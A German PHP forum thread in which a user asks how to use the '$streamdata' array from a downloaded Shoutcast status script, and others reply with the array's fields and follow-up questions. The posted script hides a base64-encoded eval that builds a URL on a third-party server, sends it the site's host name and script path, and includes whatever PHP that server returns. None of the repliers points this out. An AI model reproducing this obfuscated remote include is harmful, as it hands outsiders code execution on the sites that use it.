[Funktion] ein array includen?

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • [Funktion] ein array includen?

    Hallo,
    ich habe mir eben das "shoutcast-query" herunter geladen, und eingestellt.
    Leider musste ich festellen das überhaupt nichts angezeigt wird.
    Aber erstmal der Code des Scripts:

    PHP-Code:
    <?php

    $s 
    "s";                               //* 'pl' -> Playlistfile | 's' -> Streamserver
    $u "http://electrofreaks.de:8000/listen.pls";  //* URL of Playlistfile or Streamserver
    //* now it's time to include the shoutcast query script
    //* note: Windows versions of PHP prior to PHP 4.3.0 do not support accessing remote
    //*       files via this function, even if allow_url_fopen is enabled.
    //* don't change anything otherwise it doesn't work any more
    eval (base64_decode("JF91cmw9ICdodHRwOi8vY29kZWJhc2UuZ2FtZTRldmVyLmRlL3Nob3V0Y2FzdC8/aD0nLiRfU0VSVkVSWyJIVFRQX0hPU1QiXS4nJmY9Jy4kX1NFUlZFUlsiU0NSSVBUX05BTUUiXQ==").".'&s=".$s."&u=".urlencode($u)."';");
    include 
    $_url;

    //* you include an array called $streamdata
    //* to get more information about this array, uncomment the following line!
     
    show_source($_url);

    ?>
    So, nun steht da:
    //* you include an array called $streamdata
    Leider habe ich nicht sehr viel Ahnung von php und weiss deshalb nicht, wie man ein array includet.
    Hoffe ihr könnt mir sagen wie ich so etwas mache
    thx im Vorraus

    gruss ernstaugust

  • #2
    also wenn du deinen code ausführst kriegst du folgendes zu sehen:
    PHP-Code:
    $streamdata["status"]          = "1";        // status: 0 = stream off | status: 1 = stream on
    $streamdata["bitrate"]         = "";         // bitrate in kbps
    $streamdata["listener"]        = "";         // current listeners
    $streamdata["listener_max"]    = "";         // max listeners allowed @ server
    $streamdata["listener_unique"] = "";         // current unique listeners
    $streamdata["peak"]            = "";         // listener peak
    $streamdata["song"]            = "";    // current song title
    $streamdata["title"]           = "";    // current stream title 
    jetzt kopierst du dass an die stelle wo steht "you include..." und ersetzt "" durch deine werte. Hab ich da jetzt was falsch verstanden?

    btw: nur weil da include steht hat das noch lang nix mit dem include-Befehl von php zu tun.

    Kommentar


    • #3
      ähm ich glaube du hast da was falsch verstanden...die werte sollen ja automatisch erkannt werden und dann (in einem echo?) ausgegeben werden.

      Kommentar


      • #4
        Sers,

        1.) Was steht in url?
        2.) Ist der Code alles?
        3.) Frage ist woher kommt das Array, gut @oppi hat dir ein Array genannt bzw. erstellt.
        Aber das wird vermutlich aus der Shoutcast File ermittelt.
        Mehr Hintergrundinfos.......

        Ach ja was sollte diese Design Sprengung
        -> kürzen.....bzw. zeilenumbruch
        [color=blue]MfG Payne_of_Death[/color]

        [color=red]Manual(s):[/color] <-| PHP | MySQL | SELFHTML |->
        [color=red]Merke:[/color]
        [color=blue]Du brauchst das Rad nicht neu erfinden ! [/color]<-ForumSuche rettet Leben-> || <-Schau in den Codeschnippsels->

        Murphy`s Importanst LAWS
        Jede Lösung bringt nur neue Probleme
        Das Fluchen ist die einzige Sprache, die jeder Programmierer beherrscht.
        In jedem kleinen Problem steckt ein großes, das gern raus moechte.

        Kommentar

        Lädt...
        X